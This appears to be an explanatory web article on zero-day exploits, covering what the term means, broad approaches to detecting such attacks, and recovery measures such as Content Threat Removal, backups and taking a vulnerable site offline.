Zero-Day Exploits Defined
“Zero-day” is a loose term for a recently discovered vulnerability or exploit for a vulnerability that hackers can use to attack systems. These threats are incredibly dangerous because only the attacker is aware of their existence. Exploits can go unnoticed for years and are often sold on the black market for large sums of money.
These exploits are considered “zero-day” before and on the day that the vendor is made aware of the exploit’s existence, with “zero” referring to the number of days since the vendor discovered the vulnerability. “Day zero” is the day the vendor learns of the vulnerability and begins working on a fix. The Common Vulnerabilities and Exposures is a comprehensive list of known security vulnerabilities.
How Do You Detect a Zero-Day Attack?
While zero-day attacks are, by definition, very difficult to detect, several strategies have emerged:
- Statistics-based detection employs machine learning to collect data from previously detected exploits and create a baseline for safe system behavior. While this method has limited effectiveness and is subject to false positives/negatives, it can work well in a hybrid solution.
- Signature-based detection uses existing databases of malware and their behavior as a reference when scanning for threats. After using machine learning to analyze and create signatures for existing malware, it is possible to use the signatures to detect previously unknown vulnerabilities or attacks.
- Behavior-based detection detects malware based on its interactions with the target system. Rather than looking at incoming files’ code, the solution analyzes the its interactions with existing software to predict if it’s the result of malicious attack.
- Hybrid detection combines the above three techniques to take advantage of their strengths while mitigating their weaknesses.
Zero-Day Exploit Recovery
It is almost impossible to prevent zero-day attacks, as their existence can stay hidden even after the vulnerability is exploited. However, emerging technologies and techniques can provide some layer of protection against these threats, and there are steps you can take to mitigate damage once an exploit is discovered.
Content Threat Removal (CTR)
CTR is a detection-based defense technology that intercepts data on its way to its destination. It assumes all data is hostile and prevents its direct delivery, only allowing the business information carried by the data. Rebuilding the data into this new form helps ensure its safety, as it discards any potentially dangerous elements of the original data.
Disaster Recover Strategy
If you are affected by a zero-day attack, it is critical to have a comprehensive disaster recovery strategy in place to mitigate damage. This includes a combination of on-site and cloud-based storage for data backup.
One of the most common recovery methods for a zero-day attacks is to physically (or via a network-based firewall) remove all access from anyone who would have the ability to exploit it. For example, if WordPress was vulnerable to a zero-day exploit that granted full, unauthenticated read/write access, one course of action would be to shut off the website until a patch is released.